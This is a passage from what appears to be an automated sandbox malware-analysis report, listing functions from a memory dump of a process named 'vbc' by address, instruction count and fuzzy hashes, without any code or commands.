                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dc95cdb8b4ea03b2a37590b47f3420eb72a8c381148b9a836e031cc3dee21e6e
                                                                                    • Instruction ID: 415c0757962a2c5229e03f13d8812538d5d429d829e878e35d12bf9ea1c4a428
                                                                                    • Opcode Fuzzy Hash: dc95cdb8b4ea03b2a37590b47f3420eb72a8c381148b9a836e031cc3dee21e6e
                                                                                    • Instruction Fuzzy Hash: 0A719170A18719EFCF10CF99D94AE5ABBF9FF80700F15419AE649EB254DB318A04CB54
                                                                                    Function 0589260B Relevance: .2, Instructions: 201COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f36f31ea2e0e7bafb1a219a525a206ee1f448acb32198843582bcafd6967597c
                                                                                    • Instruction ID: 7b75577a58592934f06b2525393abf558cfcda6caa5dc199b19b58855e138807
                                                                                    • Opcode Fuzzy Hash: f36f31ea2e0e7bafb1a219a525a206ee1f448acb32198843582bcafd6967597c
                                                                                    • Instruction Fuzzy Hash: 7B718C79704281AFC716DF28C484B2AB7E6FF84214F0885A9EC9ACB751EB34DC45CB91
                                                                                    Function 0590035C Relevance: .2, Instructions: 198COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                    • Instruction ID: 8d68fd827deb2d9f4736b748bc67e214e1e4a96c1cdbfd48bb486cb4b226590a
                                                                                    • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                    • Instruction Fuzzy Hash: DE714271A00619EFCB15DFA9C948B9EBBB9FF84704F144969D505E7290DB34EE01CB90
                                                                                    Function 059162A0 Relevance: .2, Instructions: 198COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 73ef1f037c8ae70731ec30f3fad6ef5472011f0361e6f9baa0193a4321bba625
                                                                                    • Instruction ID: 175636bfd32baf1a207974f16643fe2756784dd7558c6faafe77d9457496848c
                                                                                    • Opcode Fuzzy Hash: 73ef1f037c8ae70731ec30f3fad6ef5472011f0361e6f9baa0193a4321bba625
                                                                                    • Instruction Fuzzy Hash: C971F332A00719AFEB36CF18C844F66BBAAFF40710F154818E95787AE0DB75E945CB54
                                                                                    Function 058BCDB1 Relevance: .2, Instructions: 197COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8703a345d139c9b766362fca8bc46baf2257a85bebd7d04675a95815fe283a43
                                                                                    • Instruction ID: 72ebcad3d51fbbc3a51a32381a00d482c80a00e41100f6d755cf88c438381569
                                                                                    • Opcode Fuzzy Hash: 8703a345d139c9b766362fca8bc46baf2257a85bebd7d04675a95815fe283a43
                                                                                    • Instruction Fuzzy Hash: 4B617F71B0020ADFDB18DF68C885AAEB7B6FF49314F144569EA12EB290DB719D01CF61
                                                                                    Function 0587CF50 Relevance: .2, Instructions: 190COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                                    • Instruction ID: 5ced6b27319eec226cfdfcfc616a157fdb988236527e05c1008686c003a4c434
                                                                                    • Opcode Fuzzy Hash: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                                    • Instruction Fuzzy Hash: 29719971645B0ACBD7358E24CA44B32BBE2BF51364F640A2DDCE2C29E1E765EC41CB50
                                                                                    Function 0593A250 Relevance: .2, Instructions: 184COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b2ad54d8e5650fca5eb68886c75024f13ed9d5b5a50448fd147df25c151ed09
                                                                                    • Instruction ID: e78d73a1e92c609d6500fea2794769327e465e3711d8fdd09d0c51488429bc4d
                                                                                    • Opcode Fuzzy Hash: 2b2ad54d8e5650fca5eb68886c75024f13ed9d5b5a50448fd147df25c151ed09
                                                                                    • Instruction Fuzzy Hash: 9951AD72608715EFD712DB68C889E6BB7E9EBC5750F010929FA80DB150E631ED04CBA2
                                                                                    Function 058AEDD3 Relevance: .2, Instructions: 166COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1d1d7a84bca3b331451b757bc001fceabffb831f073db24d0e87887b4562ac7f
                                                                                    • Instruction ID: b2f38914ef3104c6de8026c5f0c17e71558635cb915a95eaa03bd2b4d0126f8f
                                                                                    • Opcode Fuzzy Hash: 1d1d7a84bca3b331451b757bc001fceabffb831f073db24d0e87887b4562ac7f
                                                                                    • Instruction Fuzzy Hash: B851AF72700745AFEB24EF59C488A2AB7BAFB45209F504C2DE982C7652DB74FC44CB91
                                                                                    Function 058ACDF0 Relevance: .2, Instructions: 165COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                    • Instruction ID: 6a1e01d319258c748df2a4a451e6de39ff3d1e3fe6b9ba782c437afbf6046128
                                                                                    • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                    • Instruction Fuzzy Hash: D3518F76E1460ADFDB14CFACC5806EEBBBAFB49210F148169DD56FB200D634AE41CB94
                                                                                    Function 05948DAE Relevance: .2, Instructions: 162COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e0fd17d8e3c07f0102a7b2ff2b6d1dcba5e9934cb8977193f755fba3d59ecb47
                                                                                    • Instruction ID: 8fa23b24a77784cbe1f9bb03ee16f414662203d315cb9bbbb9fbd9fa807bc89f
                                                                                    • Opcode Fuzzy Hash: e0fd17d8e3c07f0102a7b2ff2b6d1dcba5e9934cb8977193f755fba3d59ecb47
                                                                                    • Instruction Fuzzy Hash: 17519C726087029BD711DF28C844FABB7EAFF84350F048929F98697291D734ED09CB96
                                                                                    Function 05928350 Relevance: .2, Instructions: 161COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d88f49681d4d7a18dec50120139f8f3674f47e4036d9748b63ac1a6d49eb28ba
                                                                                    • Instruction ID: 22b06854e35689375fad3a75a705ea7a62914bf328e11d1f615d5006945015b4
                                                                                    • Opcode Fuzzy Hash: d88f49681d4d7a18dec50120139f8f3674f47e4036d9748b63ac1a6d49eb28ba
                                                                                    • Instruction Fuzzy Hash: 41519070A00714DFD720DF56C888AABFBF9FF94710F104A1ED196976A4D7B0A945CB90
                                                                                    Function 058BE443 Relevance: .2, Instructions: 158COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d425d17b17edcd2955328a6127eabf3884ae6d78815aafae0e40aa9e84944caa
                                                                                    • Instruction ID: 1a58baa84811fe3d1e5417b020af870165c5abff5804cedccc39b6988ea1a3a9
                                                                                    • Opcode Fuzzy Hash: d425d17b17edcd2955328a6127eabf3884ae6d78815aafae0e40aa9e84944caa
                                                                                    • Instruction Fuzzy Hash: 4B515D71200A04DFDB25EF68C984EAAB7BEFF08744F54086AEA56D7260DB74ED40CB51
                                                                                    Function 058AAE00 Relevance: .2, Instructions: 158COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0dd880a76b3c9ad43efb921dc5a3afa35dc6003f9888093ab0210770e1e55351
                                                                                    • Instruction ID: 5ff508137cea570b9f4b69af9445bb7930302aa0896db2ae20c16c3224175447
                                                                                    • Opcode Fuzzy Hash: 0dd880a76b3c9ad43efb921dc5a3afa35dc6003f9888093ab0210770e1e55351
                                                                                    • Instruction Fuzzy Hash: 9F51EE33B11644EBEB2AAF18C894F3A777AFB42B58F158068ED01DBA50C634DC01CB81
                                                                                    Function 058A45B1 Relevance: .2, Instructions: 156COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                    • Instruction ID: 3438a79a5518ca16de26cd39f7faa4328937849c8d8b63096c42ed5fb6b8afac
                                                                                    • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                    • Instruction Fuzzy Hash: 38518A76E0424EABEF16DB98C440BAEBBB5AF45754F044069ED01EB260D7B4DD44CBA0
                                                                                    Function 05924180 Relevance: .2, Instructions: 156COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 48b7b9459de032a38a7f7b2cdc8676b98a3863c04c10258a8f4836817fbc82e0
                                                                                    • Instruction ID: 98ea303fdab45d15ed6a92317ff5dcd29a769d09a6f702998d9e1db1338b1268
                                                                                    • Opcode Fuzzy Hash: 48b7b9459de032a38a7f7b2cdc8676b98a3863c04c10258a8f4836817fbc82e0
                                                                                    • Instruction Fuzzy Hash: 665169726083569FCB54DF29C981A6BB7E9FFC8208F44492DF889C7254EB30D905CB96
                                                                                    Function 0587EFD8 Relevance: .2, Instructions: 153COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 965db4decf6113719aa8beaeb03beb88c06d0c6249cdf7593d167a648d3e9840
                                                                                    • Instruction ID: d226dde31487a69f1716193363e6658457dd2f52ad44d0e3a7f3b0a8059a606c
                                                                                    • Opcode Fuzzy Hash: 965db4decf6113719aa8beaeb03beb88c06d0c6249cdf7593d167a648d3e9840
                                                                                    • Instruction Fuzzy Hash: EC514C716083459FC700DF29D884A6BBBE9EF88218F14492DFD99C7291DB34ED05CBA2
                                                                                    Function 0587AE90 Relevance: .2, Instructions: 151COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 361a80ad6d64a4c29dc10b9c7c3329b868c2c3ab82e8b6cb6dd7728e1f382d9a
                                                                                    • Instruction ID: 551b3094928847c2dc3f79d1f4a719c185778b81d4dc848b536c569d4444e0d7
                                                                                    • Opcode Fuzzy Hash: 361a80ad6d64a4c29dc10b9c7c3329b868c2c3ab82e8b6cb6dd7728e1f382d9a
                                                                                    • Instruction Fuzzy Hash: 0351ADB1A09A4D9FDB19DB68D884BBDFBE2BB44714F14012AEC16E7280D734EC40C7A5
                                                                                    Function 058BCC00 Relevance: .1, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8690c10dd4c663d4e0130e71894791ee662848966193865f81657a53941fe8a6
                                                                                    • Instruction ID: a8165d05b4f0e5b87100b7d4461f464554fbd723766110d9e89b5c881a6966b0
                                                                                    • Opcode Fuzzy Hash: 8690c10dd4c663d4e0130e71894791ee662848966193865f81657a53941fe8a6
                                                                                    • Instruction Fuzzy Hash: 9251FA3030430BCBFB24CE14D565BBA7A9AFB96255F18852AED0BCA311D7B0CC81DB52
                                                                                    Function 058BA430 Relevance: .1, Instructions: 139COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 78fa8883e557bae077329b76e50eb5026d8e56bd1bff4a26dd1496b60a535f0f
                                                                                    • Instruction ID: 1b0d50eb3b89d8c4b6d38746d5d2422ae05d22792c4df740139ab60032abfafc
                                                                                    • Opcode Fuzzy Hash: 78fa8883e557bae077329b76e50eb5026d8e56bd1bff4a26dd1496b60a535f0f
                                                                                    • Instruction Fuzzy Hash: FB41E7717443099BEB18FE699886FAA3A6AFB48714F01012EFE02DB351EBB59D00C751
                                                                                    Function 058B01F8 Relevance: .1, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a59bc54eec7f15446618f38a1b34881ae64cdeccbb932572b26914f1eda95f36
                                                                                    • Instruction ID: 59831028423cbe6543e8cf60d9693297b7e7503da94de97666242e770cc8f0a9
                                                                                    • Opcode Fuzzy Hash: a59bc54eec7f15446618f38a1b34881ae64cdeccbb932572b26914f1eda95f36
                                                                                    • Instruction Fuzzy Hash: 2141DD35A00218DBEF15DF98C448AEEB7B9BF48604F14826AEC1AF7340D770AD45CBA5
                                                                                    Function 058C2750 Relevance: .1, Instructions: 137COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                    • Instruction ID: 3fc787db7337d1cffe5eaaf1c165a4f3120b75f2169b7b0a3b029d4789846bfd
                                                                                    • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                    • Instruction Fuzzy Hash: B7514C75A00619CFCB18CF58C580AADF7B6FF88724F2481A9D959E7750D730AE41CB90
                                                                                    Function 05886154 Relevance: .1, Instructions: 133COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8603a316bb9bd4feda6a088dd1ffd3c211b9b5c750c0f231febf3ae5f8ce54ba
                                                                                    • Instruction ID: 4fd0b5d8daa493b7aa5f8c89702a29f27f435b469fcc94fa13fa4c5e7081ca94
                                                                                    • Opcode Fuzzy Hash: 8603a316bb9bd4feda6a088dd1ffd3c211b9b5c750c0f231febf3ae5f8ce54ba
                                                                                    • Instruction Fuzzy Hash: 8851C470A0461ADBDB25EB28C809BF8B7B2FF11314F1442E5D92AE72C1EB749D81CB41
                                                                                    Function 05880D59 Relevance: .1, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b0cd8ab2299ac646e4d41c7df9e3a42a8aa428db2b7ac98ec8ed6e87f350853b
                                                                                    • Instruction ID: 9bde5f1481e981a7104a4053e1d542ba41461f7eb057f73e028097d35e052a93
                                                                                    • Opcode Fuzzy Hash: b0cd8ab2299ac646e4d41c7df9e3a42a8aa428db2b7ac98ec8ed6e87f350853b
                                                                                    • Instruction Fuzzy Hash: 39419071600318DFEB25EF24CC89F7BB7AAEB45614F04049AED86DB281DB74ED44CA52
                                                                                    Function 0594866E Relevance: .1, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                    • Instruction ID: 302dd57e67799c1c5f9388c4d7565704a3bb5d9f63e0df696cea90b260d68c8e
                                                                                    • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                    • Instruction Fuzzy Hash: 9141B275B10205ABDF15DFA9CC94EBFBBBEBF89240F184069E801A7341DA70DD008BA0
                                                                                    Function 058AA470 Relevance: .1, Instructions: 127COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: afb2e99ce57ac2c47bc5d17f06b11df60e8d4b1818810cc7cb20b3713bef14dc
                                                                                    • Instruction ID: 7fdfbdae22071c7d1b75980755d98b8e9ba9447e713420a2537602f6672f2ee7
                                                                                    • Opcode Fuzzy Hash: afb2e99ce57ac2c47bc5d17f06b11df60e8d4b1818810cc7cb20b3713bef14dc
                                                                                    • Instruction Fuzzy Hash: 1E41BF32A49208CFEF19DFA8C8947A97BB5BB09314F140156E826EB691DB34DD40CBA4
                                                                                    Function 0587A020 Relevance: .1, Instructions: 122COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                    • Instruction ID: d9bb92c1910d0f932571674d8fc6787381d684aabb50edbb5c22efc6d4ca1fab
                                                                                    • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                    • Instruction Fuzzy Hash: C7411931B08219DBDB28DE598444BBEFBA2FB40756F16846AEC46DB240D631DD40DFA1
                                                                                    Function 058B0710 Relevance: .1, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                    • Instruction ID: 77e22617dc794e403b5a39541f46546d4d7f52235fc1d3698f11287402fdf60d
                                                                                    • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                    • Instruction Fuzzy Hash: E6411675A04705EFEB24CF98C984AAAB7F9FB08700B10496DE956DB390D770AE44CB94
                                                                                    Function 0588262C Relevance: .1, Instructions: 119COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3ba416bd55b306cffd505a51d7765816edaffdbcf6997d07db223099c6059c5b
                                                                                    • Instruction ID: c324894a08766b5f5f41c7ca904cc4db06ee4de12ffdeb625311c490a966fba8
                                                                                    • Opcode Fuzzy Hash: 3ba416bd55b306cffd505a51d7765816edaffdbcf6997d07db223099c6059c5b
                                                                                    • Instruction Fuzzy Hash: F4414875605B08DFCB25FF29C944A69B7F2FB84214F1482AAD917DB2A0EB309D41CB52
                                                                                    Function 059007C3 Relevance: .1, Instructions: 114COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 146bfc974076ef5e81d586ed03940b56a3b7570a25f02e15d3b45794da1b64b5
                                                                                    • Instruction ID: 4b23da6bf60db239f88d28c1094d90cb120cfbe3b1db4edb8478307038c843ac
                                                                                    • Opcode Fuzzy Hash: 146bfc974076ef5e81d586ed03940b56a3b7570a25f02e15d3b45794da1b64b5
                                                                                    • Instruction Fuzzy Hash: F44171716183049FD760DF28C849B9BBBE8FF88654F404A2EF998D7290DB74D904CB92
                                                                                    Function 059005A7 Relevance: .1, Instructions: 111COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6876cc78266b85a8408f905529d4d466a35d8547c37e07a579ddf141693f1b7a
                                                                                    • Instruction ID: 4651e63935aba0f060af1fa275c0b26ed9e146b8f379d48c13f30c38fb9e0e6c
                                                                                    • Opcode Fuzzy Hash: 6876cc78266b85a8408f905529d4d466a35d8547c37e07a579ddf141693f1b7a
                                                                                    • Instruction Fuzzy Hash: 2A41C0726087419FC320DF69C844BAAB7AAFFC8700F440A2DF895D7690E730E904C7A6
                                                                                    Function 05886EE0 Relevance: .1, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f877fda14c8441c137ce4a4845dfee86641c8d9ce650320ff6f1233038e6404f
                                                                                    • Instruction ID: b290ec31e7a71097febbe8bb723c74ab0e4c0c46c10d3d3a7b66bb821a53783f
